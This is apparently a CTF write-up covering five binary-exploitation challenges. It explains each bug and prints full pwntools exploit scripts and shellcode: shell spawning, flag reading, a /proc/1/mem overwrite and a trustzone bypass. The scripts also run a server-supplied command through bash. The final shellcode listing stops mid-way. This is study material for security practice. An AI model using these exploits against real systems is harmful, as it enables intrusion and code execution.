alt text

Write-ups for 5 challenges I solved.

Attachment

multiarch-2

Analyze

First, I analyzed two functions mapSegment(0x1319) and panic (0x2A1E) to figure out the structor of VM:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
struct __attribute__((packed)) BufIO
{
char *data;
uint offset;
};


struct __attribute__((packed)) __attribute__((aligned(1))) VM
{
void *page1;
void *page2;
void *pagedummy;
char *page3;
size_t size3;
char *(*func)(void);
char check[3];
int rip;
int stack;
uint regs[4];
BufIO bufs[5];
uint bufcount;
};


VM *__fastcall mapSegment(SegmentList *SegmentList)
{
VM *vm; // rbx
void *page1_; // r14
void *page2_; // r13
void *page3_; // r12
size_t size; // r13

vm = (VM *)calloc(1uLL, 0x88uLL);
page1_ = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
vm->page1 = page1_;
page2_ = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
vm->page2 = page2_;
vm->pagedummy = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
page3_ = calloc(1uLL, SegmentList->chunk3.size);
vm->page3 = page3_;
vm->func = getFlag;
memcpy(page1_, SegmentList->chunk1.data, SegmentList->chunk1.size);
memcpy(page2_, SegmentList->chunk2.data, SegmentList->chunk2.size);
size = SegmentList->chunk3.size;
memcpy(page3_, SegmentList->chunk3.data, SegmentList->chunk3.size);
vm->size3 = size;
vm->rip = 4096;
vm->stack = 0x8F00;
return vm;
}

void __fastcall __noreturn panic(VM *vm, char a2)
{
int i; // ebp
unsigned int current_stack; // r12d
const char *__; // rsi
int dest; // [rsp+Ch] [rbp-44h] BYREF
unsigned __int64 v6; // [rsp+10h] [rbp-40h]

v6 = __readfsqword(0x28u);
printf(
" ---[ PC=0x%08x SP=0x%08x | A=0x%08x B=0x%08x C=0x%08x D=0x%08x\n",
vm->rip,
vm->stack,
vm->regs[0],
vm->regs[1],
vm->regs[2],
vm->regs[3]);
if ( a2 )
{
puts(" ---[ STACK CONTENTS");
for ( i = -8; i != 20; i += 4 )
{
current_stack = vm->stack + i;
if ( !read_4(vm, current_stack, &dest) )
break;
__ = " ";
if ( vm->stack == current_stack )
__ = "* ";
printf("\t%s0x%08x 0x%08x\n", __, current_stack, dest);
}
}
}

Basically, the VM struct has one PC register, one stack register and 4 general purpose registers.
It has three pages ( page1, page2 and page_dummy) which used to store the bytecodes, page3 is used to store the data.

func is the function pointer which would be called in getFlag:

1
2
3
4
5
6
7
8
9
char *getFlag()
{
char *v0; // rbx

v0 = getenv("FLAG");
if ( !v0 )
fwrite("[E] no $FLAG set! do you need to hack harder?\n", 1uLL, 0x2EuLL, stderr);
return v0;
}

When I saw this function, I knew my job is overwritting this function pointer.

For the more details how these 4 pages work, let review getDesc and allocNewSegment.
In the getDesc function, it would return:

  • page1 + offset - 0x1000 if the offset is in range [0x1000, 0x20000) ( This is why the initialize value of pc is 0x1000)
  • page2 + offset - 0x2000 if the offset is in range [0x2000, 0x3000)
  • pagedummy + offset - 0x3000 if the offset is in range [0x8000, 0x9000)
  • Otherwise, it would return bufs.data[offset-object_offset]

To figure out where these bufs object come from, check allocNewSegment:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
bool __fastcall allocNewSegment(VM *vm, int offset, unsigned int *ret)
{
unsigned __int8 n5; // r12
bool result; // al
unsigned int final_offset; // ebx
char *data; // rax
__int64 n5_1; // rdx

n5 = vm->bufcount;
result = 0;
if ( n5 != 5 )
{
final_offset = offset & 0xFFFFF000;
if ( (offset & 0xFFFFF000) == 0 )
final_offset = 40960;
while ( getDest(vm, final_offset, 1LL) )
final_offset += 0x1000;
LOBYTE(vm->bufcount) = n5 + 1;
data = (char *)calloc(0x200uLL, 1uLL);
n5_1 = n5;
vm->bufs[n5_1].data = data;
vm->bufs[n5_1].offset = final_offset;
*ret = final_offset;
return 1;
}
return result;
}

For the first time it is called:

  • if offset < 0x1000, it would try to allocate a BufIO object which represents for the VM’s data at the offset [0xa000, 0xa000+0x200), [0xa000+0x200*n, 0xa000+0x200*(n+1) ) for next times.
  • if offset >= 0x3000, it would try to allocate a BufIO object which represents for the VM’s data at the offset [0x3000, 0x3000+0x200), [0x3000+0x200*n, 0x3000+0x200*(n+1) ) for next times.

That why getDesc whould return bufs.data[bufs.offset - offset] if the offset >= 0x3000.

Check some “interesting” syscall and find the bug

In exec_regVM function, there are two syscalls used for read/write buffer which should be useful for the future exploitation.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
{
switch ( op )
{
case 0u:
return 0;
case 1u:
LOBYTE(Int_1) = check_sys_num(vm);
Int = Int_1;
if ( (_BYTE)Int_1 )
{
switch ( vm->regs[0] )
{
case 0u:
Int = getInt(vm, &y);
if ( (_BYTE)Int )
vm->regs[0] = y;
else
vm->check[0] = 1;
break;
case 1u:
Int = readBuf(vm, vm->regs[1], vm->regs[2]);
if ( !(_BYTE)Int )
vm->check[0] = 1;
break;
case 2u:
Int = printBuf(vm, vm->regs[1], vm->regs[2]);
if ( !(_BYTE)Int )
vm->check[0] = 1;
break

I could call syscall 0 to change regs[0] and call any sycalls I want, but I had to find the way to control regs[1] and regs[2]

This thought let me to check the opcode 0x21 of regVM. In this case, I could add the value of one reg with any value:

1
2
3
4
5
6
7
8
9
case 0x21u:
v16 = vm->rip;
vm->rip = v16 + 1;
if ( (unsigned __int8)read_1(vm, v16, &n)
&& (LOBYTE(Int_3) = read_4(vm, (unsigned int)vm->rip, &y), Int = Int_3, (_BYTE)Int_3) )
{
vm->rip += 4;
vm->regs[(n >> 4) - 1] += y;
}

And … so I found something interesting. Since I could control the value of n, there is no check to make sure whether n is in bound of regs or not, that means I could also change the value of bufs!

Up to now, everything was clear. I just need to call allocNewSegment to allocate a BufIO object and change its data to an address that is useful to leak memory.

Xrefs the allocNewSegment, I could use syscall 6 of stackVM to call the function with any arguments I want:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
if ( op.op == (char)0xA0 )
{
if ( check_sys_num(vm) )
{
if ( (unsigned __int8)read_1_stack(vm, &dest) )
{
switch ( dest )
{
...
case 6:
if ( (unsigned __int8)read_4_stack(vm, &inp)
&& allocNewSegment(vm, inp, &ret)
&& (unsigned __int8)pushInt(vm, ret) )
{
goto LABEL_22;
}
...
}
}
}
}
...

Calculate the offset between vm object and the first BufIO::data, we could change the data to vm->page2 and leak page2‘s address.

After that, just change the data to vm->func and func would point to page2 (which we could setup our shellcode on there).

alt text

Since the program use bittest to determine it should use regVM or stackVM. I asked chatGPT for helping crap right payload :).

Final script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.binary = e = ELF("debug")
libc = e.libc
gs = """
ida_connect
"""


def start():
if args.LOCAL:
p = e.process(["inp.masm"])
elif args.GDB:
p = gdb.debug([e.path, "inp.masm"], gdbscript=gs)
elif args.REMOTE: # python x.py REMOTE <host> <port>
host_port = sys.argv[1:]
p = remote(host_port[0], int(host_port[1]))
p.recvuntil(b'You can run the solver with:\n')
cmd = p.recvline().decode()
log.info(cmd)
ans = popen(f"bash -c '{cmd}'").read()
p.sendlineafter(b'Solution? ', ans.encode())
data = open("inp.masm", "rb").read()
p.sendlineafter(b"How big is your program? ", str(len(data)).encode())
p.send(
data
)
return p


rip = 4096


def set_page3_bit(page3, rip, should_be_set):
# Apply same logic as in C:
v2 = rip - 4089
if rip >= 4096:
v2 = rip - 4096
index = v2 >> 3
bit = rip & 7
if not (0 <= index < len(page3)):
print(f"Warning: v2 >> 3 = {index} out of bounds")
return
if should_be_set:
page3[index] |= (1 << bit)
else:
page3[index] &= ~(1 << bit)


f = open("inp.masm", "wb")
f.write(b"MASM")


instructions = [
[0, p8(0x10)+p32(6)], # push 6
[0, p8(0xa0)+p32(0)], # call allocNewSegment(0)
[1, p8(0x21)+p8(5 << 4)+p32(0xffffef88)], # Change data -> page2
[1, p8(0x21)+p8(1 << 4)+p32(2)], # syscall 2
[1, p8(0x21)+p8(2 << 4)+p32(0xa000)],
[1, p8(0x21)+p8(3 << 4)+p32(0x8)],
[1, p8(1)], # print
[1, p8(0x21)+p8(5 << 4)+p32(0xffffffd8)],
[1, p8(1)],
[1, p8(0x21)+p8(5 << 4)+p32(0x28)],
[1, p8(0x21)+p8(1 << 4)+p32(0xffffffff)], # syscall 1
[1, p8(1)], # write
[0, p8(0x10)+p32(5)], # call getFlag
[0, p8(0xa0)+p32(0)],
]

segAdata = b''
segBdata = asm(shellcraft.cat("/flag"))
segCdata = bytearray(0x1000)

for ins in instructions:
segAdata += ins[1]


for expected, instr in instructions:
set_page3_bit(segCdata, rip, expected)
rip += len(instr)


segA = p8(1)+p16(19)+p16(len(segAdata))
segB = p8(2)+p16(19+len(segAdata))+p16(len(segBdata))
segC = p8(3)+p16(19+len(segAdata)+len(segBdata))+p16(len(segCdata))

f.write(segA+segB+segC+segAdata+segBdata+segCdata)

f.close()

p = start()

p.recvuntil(b'[I] executing program\n')
e.address = u64(p.recv(8)) - e.sym.getFlag
log.success(hex(e.address))

# p.sendline(p64(e.plt.puts))
segA_addr = u64(p.recv(8))

p.sendline(p64(segA_addr-0x1000))


p.interactive()

the-classic-notes-app

Bug

write_note doesn’t check if offset is larger the note‘s size or not:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
void write_note(int index, int offset, const char *buffer, int size)
{
if (index < 0 || index >= note_size)
{
printf("Index out of range\n");
return;
}
if (notes[index] == NULL)
{
printf("Create note first\n");
return;
}
if (offset < 0)
{
printf("Offset cannot be less than 0\n");
return;
}
memcpy(notes[index] + offset, buffer, size); // bug
}

Exploit

To make it easy to debug, I do not set GLIBC_TUNABLES='glibc.mem.tagging=1'.

alt text

  • Just write to notes[0] at offset 0x60, we actually change the value of notes[0].
    alt text

  • Write \xb8\x02 to make notes[0] point to flag function pointer.

  • After that, read notes[0] to leak the flag function address.

  • Write notes[0] at offset 0x18 to change the exit function pointer, we would want it become flag.

  • Try to change notes[0] to unvaild address -> read note -> segfault -> call flag

This seems quite easy, but what if set GLIBC_TUNABLES='glibc.mem.tagging=1':
alt text
alt text

The offset is random now, but just only for the highest byte.

So I just need to bruteforce offset, P=1/256:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#!/usr/bin/env python
from pwn import *
from time import sleep

context.binary = e = ELF("ctf")

gs = """
target remote:1234
"""


def start():
argvs = ["./qemu-aarch64", "-L", "./aarch64-linux-gnu/"]
if args.LOCAL:
argvs.append(e.path)
p = process(argvs)
elif args.GDB:
argvs.append("-g")
argvs.append("1234")
argvs.append(e.path)
p = process(argvs)
# gdb.attach(None, gdbscript=gs)
# pause()
elif args.REMOTE: # python x.py REMOTE <host> <port>
host_port = sys.argv[1:]
p = remote(host_port[0], int(host_port[1]))
return p


def create_note(size: int):
p.sendlineafter(b'Give me your command:\n', b"C"+str(size).encode())


def read_note(idx: int):
p.sendlineafter(b'Give me your command:\n',
b'R'+str(idx).encode())


def write_note(idx: int, offset: int, size: int, data: bytes):
p.sendlineafter(b'Give me your command:\n',
b'W' + f"{idx} {offset} {size}".encode()+data)


for i in range(256+10):
try:
p = start()
# create_note(0x30)
in0 = p16(0x2a8)
write_note(0, 0x000000000000060, len(in0), in0)
read_note(0)
p.recvuntil(b'Note at 0: ')
in1 = p.recv(6)

except EOFError:
p.close()
continue
else:
log.info(hex(u64(in1+b'\0'*2)))
write_note(0, 0x10, len(in1), in1)
write_note(0, 0xf0-8, 8, b'A'*8)
read_note(0)
break

p.interactive()

pwn-datadefinition

Analyze

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import subprocess
import sys


def main():
print('Do you like dd? It is my favorite old-style tool :D\n')
line = input(' > What is your favorite dd line?: ').encode()
user_input = input(' > Any input to go with it?: ').encode()
print('I like it! Let\'s give it a go!')
res = subprocess.run(['dd'] + line.split(), input=user_input,
capture_output=True)
print(res.stdout.decode('utf-8'))
print(res.stderr.decode('utf-8'))
print('It was fun, bye!')


if __name__ == '__main__':
main()

With dd, we can read/write any files, any where we want.
But the flag file has random name.

alt text

Somehow, the python file on the container is a static binary.

The author did not write about this on the challenge’s discription. From now, I could say it is a guessy challenge.

Since the addresses is not changed, we could use /proc/.../mem trick.

In the config files, I could guess the pid of python process should be 1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
mode: ONCE
uidmap {inside_id: "0"}
gidmap {inside_id: "0"}
keep_caps: true
...

cwd: "/home/user"

mount: [
....
{
dst: "/proc"
fstype: "proc"
rw: true
}
...
]
1
2
3
4
5
CMD kctf_setup && \
kctf_drop_privs \
socat \
TCP-LISTEN:1337,reuseaddr,fork \
EXEC:"kctf_pow nsjail --config /home/user/nsjail.cfg -- /usr/bin/python3 -u /home/user/chall.py"

Since keep_caps is true, we should be able to write on /proc/1/mem.

alt text

Now, I have to write what and where?

Since line and user_input use default encoding of Python which is utf-8, I could not write any bytes I want, the byte should not be greater than 0x7f.

I found that when pymain_main is going to return, rdi=0, rsi=rsp-0x208, and rdx is big enough. So I just wrote syscall ; ret at the end of the function.
alt text

I could say that I was luckly to see this way to deal with this guessy challenge.

Final script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.arch = 'amd64'
shellcode = asm("""
syscall
ret
""")
escaped = ''.join(f'\\x{b:02x}' for b in shellcode)

host_port = sys.argv[1:]
p = remote(host_port[0], int(host_port[1]))

if host_port[0] != "localhost":
p.recvuntil(b'You can run the solver with:\n')
cmd = p.recvline().decode()
log.info(cmd)
ans = popen(f"bash -c '{cmd}'").read()
p.sendlineafter(b'Solution? ', ans.encode())

pause()

p.sendlineafter(b' > What is your favorite dd line?: ',
b'if=/proc/self/fd/0 of=/proc/1/mem bs=1 seek='+str(0x6BC71E).encode())
p.sendlineafter(b'Any input to go with it?:',
shellcode.decode('latin-1').encode())

pause()

p.send(
b'\0'*0x208 +
p64(0x00000000004f8dbd) + p64(0x75e1c1) + p64(0x00000000004f8dbd+1) +
p64(0x4206c0)
)

p.interactive()

pwn-playbook

Bug

The bug is only in new_playbook function:

  • Since nesting_depth is global variable, there is always a chance that p_idx can be decreased even it is still pointing to idx[0]:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
int idx[11]; // [rsp+1004h] [rbp-4Ch] BYREF
int *p_idx; // [rsp+1030h] [rbp-20h] MAPDST
int nest; // [rsp+1038h] [rbp-18h]

p_idx = idx;
nest = 1;
len = 251;
puts("Enter new playbook in the SOPS language. Empty line finishes the entry.");
idx[0] = allocate_playbook();
while ( fgets(inpbuf, len, stdin) && inpbuf[0] != 10 )
{
memset(buf, 0, sizeof(buf));
_isoc99_sscanf(inpbuf, "%s", buf);
...
{
if ( !strcmp(buf, "ENDSTEP") )
{
--p_idx;
if ( --nesting_depth < 0 )
{
puts("Mismatched STEP and ENDSTEP.");
exit(1);
}
}
  • We can decrease p_idx twice before running STEP, when p_idx is increased again, it will point to len, that means len would be equal to the return value of allocate_playbook:
1
2
3
4
5
6
7
8
9
10
11
12
if ( !strcmp(buf, "STEP") )
{
++p_idx;
if ( ++nesting_depth > 9 )
{
puts("Max nesting depth reached.");
exit(1);
}
*p_idx = allocate_playbook();
add_child(*(p_idx - 1), *p_idx);
nest = 1;
}
  • I need len should be greater than 512 so I could overwrite the next playbook via strcpy:
    1
    strcpy_ifunc(steps[*p_idx].data, buf);

this could be achive by create more than 512 playbooks before.

Exploit

Just need to change the type of the next playbook to cmd, it would run any command in note‘s data.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
#!/usr/bin/env python
from pwn import *
from os import popen
from time import sleep

context.binary = e = ELF("chal")

gs = """
set follow-fork-mode parent
# b *0x4021C5
# b *0x402605
# b new_playbook
# b *0x401E69
b *0x4025B7
"""


def start():
if args.LOCAL:
p = e.process()

elif args.REMOTE: # python x.py REMOTE <host> <port>
host_port = sys.argv[1:]
p = remote(host_port[0], int(host_port[1]))
p.recvuntil(b'You can run the solver with:\n')
cmd = p.recvline().decode()
log.info(cmd)
ans = popen(f"bash -c '{cmd}'").read()
p.sendlineafter(b'Solution? ', ans.encode())
return p


def add(list_data: list[bytes]):
p.sendline(b"2")
p.recvuntil(
b'Enter new playbook in the SOPS language. Empty line finishes the entry.\n')
for data in list_data:
# if len(data) == 251 or b'\n' in data:
# p.send(data)
# else:
p.sendline(data)


def remove(idx):
p.sendlineafter(b"5. Quit\n", b"3")
p.sendlineafter(b"Enter playbook id:\n", str(idx).encode())


def execute(idx):
p.sendlineafter(b"5. Quit\n", b"4")
p.sendlineafter(b"Enter playbook id:\n", str(idx).encode())


p = start()

# for i in range(1, 0x50):
# add([b"note: " + b'A' * 0x30, b'STEP',
# b"note: " + b'B' * 0x30, b'ENDSTEP', b'\n'])
# remove(i + 1)

# add([b"note: " + b'A' * 0x30, b'\n'])
# execute(1)
# for i in range(0x4f):
# p.recvuntil(b'Note: ')
# if i == 0xa:
# p.sendline(p8(i))
# else:
# p.send(p8(i)*251)

# sleep(1)

for i in range(1, 512+30):
if i < 3:
add([b"note: " + b'A' * 0x30, b'STEP', b'\n'])
else:
add([b"note: " + b'sh', b'\n'])
log.info(str(i))


if args.GDB:
gdb.attach(p, gdbscript=gs)
pause()

# p.sendline(b'#'*249)
# p.sendline(b"2")
# p.recvuntil(
# b'Enter new playbook in the SOPS language. Empty line finishes the entry.\n')
# p.send(b'note: ')
# for i in range(250-7):
# p.send(b' ')

# pause()

# p.proc.stdin.close()
remove(512+20)
remove(512+21)

add([b'ENDSTEP', b'ENDSTEP', b'STEP', b'note: '+b'1'*(512)+p8(1 | 2), b'\n'])

execute(512+22)

p.sendline(b'\ncat /flag ; cat /flag.txt ; cat flag.txt ; cat flag')

p.interactive()

pwn-unicornel-trustzone

Analyze

The docutment only describes how these three trustzones work, not the code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
There are currently three example trustzones you can load:

Name: create_map_shared_x86_64
Calling Convention: rax = trustzone_invoke syscall #, rbx = addr, rcx = length
Return Value: rbx = shared memory handle, or error code from create_shared if a buffer could not be created
Description: This trustzone will create and map a shared memory buffer of the desired length into the current
process at the specified address.

Name: map_shared_x86_64
Calling Convention: rax = trustzone_invoke syscall #, rbx = shared memory handle, rcx = addr, rdx = length
Return Value: rbx = 0xffff on validate_handle failure, or the return value from the map_address syscall
Description: This trustzone maps a shared memory buffer specified by the handle into the current process at
the specified address.

Name: memprot_x86_64
Calling Convention: rax = trustzone_invoke syscall #, rbx = addr, rcx = length, rdx = prot, rdi = password
Return Value: rbx = 0xffff on password authentication failure, or the return value from the memprot syscall
Description: This trustzone sets the memory protection on a range of memory. Please note that rdi must be a
pointer to a string containing the password.

So I created map_shared_x86_64 and memprot_x86_64 based on what the document says ( I don’t need create_map_shared_x86_64 since create_shared is not trusted syscall):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from pwn import *

context.arch = 'amd64'

open("map_shared_x86_64", "wb").write(asm("""
mov r10, rcx
mov rcx, rdx
mov rax, 4
int 3
//validate_handle rax = address
mov rbx, rax
mov rcx, r10
xchg rcx, rdx
xchg rdx, rbx
mov rax, 5
int 3
// map_address
mov rbx,rax
"""))
open("memprot_x86_64", "wb").write(asm("""
mov rax, 11
mov r10, rbx
mov r11, rdx
mov rbx, rdi
//confirm password
int3
cmp eax,0
je continue
mov ebx, 0xffff
jmp done
continue:
mov rbx, r10
mov rdx, r11
mov rax, 12
int3
done:
nop
"""))

As the document says, we need password authentication to be success to use memprot_x86_64

Why I needed memprot_x86_64? Because it changes perm of any address, includes trustzone:

1
2
3
4
5
6
7
long memprot(struct process* current) {
TRUSTED_SYSCALL;
unsigned long addr = ARG_REGR(current,1);
unsigned long length = ARG_REGR(current,2);
unsigned long prot = ARG_REGR(current,3);
return uc_mem_protect(current->uc,addr,length,prot);
}

Since only trustedzone’s bytecodes can call trusted syscall, being able to write these bytecodes is promising for the furture exploitation.

Leak password

Reading the source codes of confirm_password, I could be sure that password file should be in the same directory with the chal file:

1
int password_fd = open("password",O_RDONLY);

I could take advantage of the create_trustzone to read the password and many to any address since the function can open any files in the same directory:

1
2
3
4
5
6
for(unsigned i = 0; i < sizeof(filename); i++) {
if(filename[i] == '.' || filename[i] == '/') {
filename[i] = '_';
}
}
int fd = open(filename,O_RDONLY);

But the safe_read check if the address is overlap with trustedzone or not, so it was not easy to read the password:

1
2
3
4
5
6
7
8
bool overlaps_tz(struct process* current,long src, unsigned n) {
return current->trusted_zone_hook && !(src + n <= current->trustzone || current->trustzone + PAGE_ALIGN(current->tz_size) <= src);
}

uc_err safe_read(struct process* current, char* dst, long src, size_t n) {
if(overlaps_tz(current,src,n)) TRUSTED_SYSCALL;
return uc_mem_read(current->uc,src,dst,n);
}

First, I had thought to make the size be so big that src + n could cause integer overflow (which mean src + n < src).

This is ridiculous because no process can handle big size like that.

But I re-thought again, what if the value of address is so big instead of the size?

alt text
alt text

Turned out, unicorn doesn’t care if the address is in user-space or kernel-space. After all, it is just an emulator.

Since src = trustzone = 0xfffffffffffff000, and size = 0x1000; I could bypass overlaps_tz now.

alt text

Shellcode:

1
2
3
4
5
6
7
8
9
10
11
12
mov rax, 8
mov rbx, 0xfffffffffffff000
lea rcx, [rip+password]
int3

mov rax,1
mov rbx, 0xfffffffffffff000
mov rcx, 0x1000
int3

password:
.asciz "password"

Leak emulator address

With the leaked password, I could use memprot_x86_64 to enable write perm to trustzone.

The validate_handle function returns shared_buffers’s address:

1
2
3
4
5
long validate_handle(struct process* current) {
TRUSTED_SYSCALL;
...
return (long) shared_buffers[handle].buffer;
}

so I could write the shellcode calls this function and print the return value to leak address:

1
2
3
4
5
6
7
mov eax, 4
xor ebx, ebx
mov ecx, 0x1000
int3
mov rbx, rax
mov eax,2
int3

I chose to allocate a buffer has the size of 0xf000. This buffer should be fixed with TLS address, which I could take advantage of this to leak other segments’ addresses:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
mov rsp, 0x13380800

mov rax, 3
mov rbx, 0xf000
int3
// calloc 0xf000

mov rax, 8
mov rbx, 0x42420000
lea rcx, [rip+memprot_x86_64]
int3

mov rax, 10
mov rbx, 0x42420000
mov rcx, 0x1000
mov rdx, 7
lea rdi, [rip+password_buffer]
int3

mov rbx, rax
mov rax, 2
int3

mov rdi, 0x42420000
lea rsi, [rip+evil]
mov edx, 0x20
call memcpy

mov eax,10
int3

jmp $
map_shared_x86_64:
.asciz "map_shared_x86_64"
memprot_x86_64:
.asciz "memprot_x86_64"
password_buffer:
.asciz "sup3r_s3cure_sj\0"
password:
.asciz "password"
newline:
.asciz "\n"
nop

memcpy:
test rdx, rdx
jz memcpy_done
memcpy_loop:
mov al, [rsi]
mov [rdi], al
inc rsi
inc rdi
dec rdx
jnz memcpy_loop
memcpy_done:
ret

evil:
mov eax, 4
xor ebx, ebx
mov ecx, 0x1000
int3
mov rbx, rax
mov eax,2
int3

Although it was not fixed with TLS as I expected, but I could leak the heap’s address and the JIT (RWX) address:
alt text

After have the leaked address, I created a new process which overwrote its trustzone to:

1
2
mov eax, 5
int3

This shellcode could let me call map_address directly, to read/write any host’s addresses I want.

Write the shellcode on where?

Up to this point, I leaked heap address, a RWX address.

First time, I had tried to overwrite the opcode of thread 2 to the shellcode spawns shell:
alt text

But the leaked RWX address is not fixed with the RIP of the second thread on the remote.

So I tried to leak the stack address of the second thread.

Because the same shellcode and the same execution, I think call-stack of the remote process and the local one should be the same. Overwritting the second thread’s return address might be a good way.

I found that the second thread’s stack address could be leak via a pointer at heap+0x5b00.

alt text

After overwritting its return address, the final work to do is making it return.

alt text

I saw it check if the local variable ($rbp-0x10) is negative or not.

Up to this point, the variable is always equal to 0 so the thread would never stop the loop ( I think because the end of my first shellcode is jmp $
).

Changing the variable to -1 ( you could see it in the heap segment and I had leaked the heap address before).

The second thread would return and execute our shellcode.

alt text

Final script

This is so f*cking long. I suggest you should debug yourself first.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.binary = e = ELF("chal")

gs = """
"""
def start():
if args.LOCAL:
p = e.process(stderr=open("/dev/null", "w"))

elif args.REMOTE: # python x.py REMOTE <host> <port>
host_port = sys.argv[1:]
p = remote(host_port[0], int(host_port[1]))
p.recvuntil(b'You can run the solver with:\n')
cmd = p.recvline().decode()
log.info(cmd)
ans = popen(f"bash -c '{cmd}'").read()
p.sendlineafter(b'Solution? ', ans.encode())
return p

code1 = asm(open("shellcode1.asm", "r").read())+b'\x90'*0x40
data1 = p32(4) # UC_ARCH_X86
data1 += p32(1 << 3) # UC_MODE_64
data1 += (
p64(0x13370000) + p64(0x1000) +
p64(0x13380000) + p64(0x1000) +
p64(0x13390000) + p64(0x1000) +
p64(0x133a0000) + p64(0x2000)
)
data1 += p16(len(code1))
data1 += p8(3)
data1 = data1.ljust(0x50, b'\0')

p = start()

p.send(data1)
p.sendafter(b"CODE_START\n", code1)
p.recvuntil(b'new process created with pid 0\n')
p.recvuntil(b'0\n')
buf0 = int(p.recvline().decode())
log.info(hex(buf0))

code2 = asm(open("shellcode2.asm", "r").read().replace("leaked_address", str(buf0+0xf000))) + b'\x90'*0x20 + asm(shellcraft.sh())

data2 = p32(4) # UC_ARCH_X86
data2 += p32(1 << 3) # UC_MODE_64
data2 += (
p64(0x13470000) + p64(0x1000) +
p64(0x13380000) + p64(0x1000) +
p64(0x13390000) + p64(0x1000) +
p64(0x133a0000) + p64(0x2000)
)
data2 += p16(len(code2))
data2 += p8(3)
data2 = data2.ljust(0x50, b'\0')

if args.GDB:
gdb.attach(p, gdbscript=gs)
pause()

p.send(data2)
p.sendafter(b"CODE_START\n", code2)
p.interactive()

shellcode1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
mov rsp, 0x13380800
mov r10, 0x13390000

mov rax, 3
mov rbx, 0xf000
int3
// calloc 0xf000


mov rax, 8
mov rbx, 0x42420000
lea rcx, [rip+memprot_x86_64]
int3

mov rax, 10
mov rbx, 0x42420000
mov rcx, 0x1000
mov rdx, 7
lea rdi, [rip+password_buffer]
int3

mov rbx, rax
mov rax, 2
int3

mov rdi, 0x42420000
lea rsi, [rip+evil]
mov edx, 0x20
call memcpy

mov eax,10
int3

jmp $

map_shared_x86_64:
.asciz "map_shared_x86_64"
memprot_x86_64:
.asciz "memprot_x86_64"

password_buffer:
.asciz "sup3r_s3cure_sj\0"
password:
.asciz "password"
newline:
.asciz "\n"
nop

memcpy:
test rdx, rdx
jz memcpy_done
memcpy_loop:
mov al, [rsi]
mov [rdi], al
inc rsi
inc rdi
dec rdx
jnz memcpy_loop
memcpy_done:
ret

evil:
mov eax, 4
xor ebx, ebx
mov ecx, 0x1000
int3
mov rbx, rax
mov eax,2
int3

shellcode2:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
mov rax, 8
mov rbx, 0x42420000
lea rcx, [rip+memprot_x86_64]
int3

mov rax, 10
mov rbx, 0x42420000
mov rcx, 0x1000
mov rdx, 7
lea rdi, [rip+password_buffer]
int3

mov rbx, rax
mov rax, 2
int3

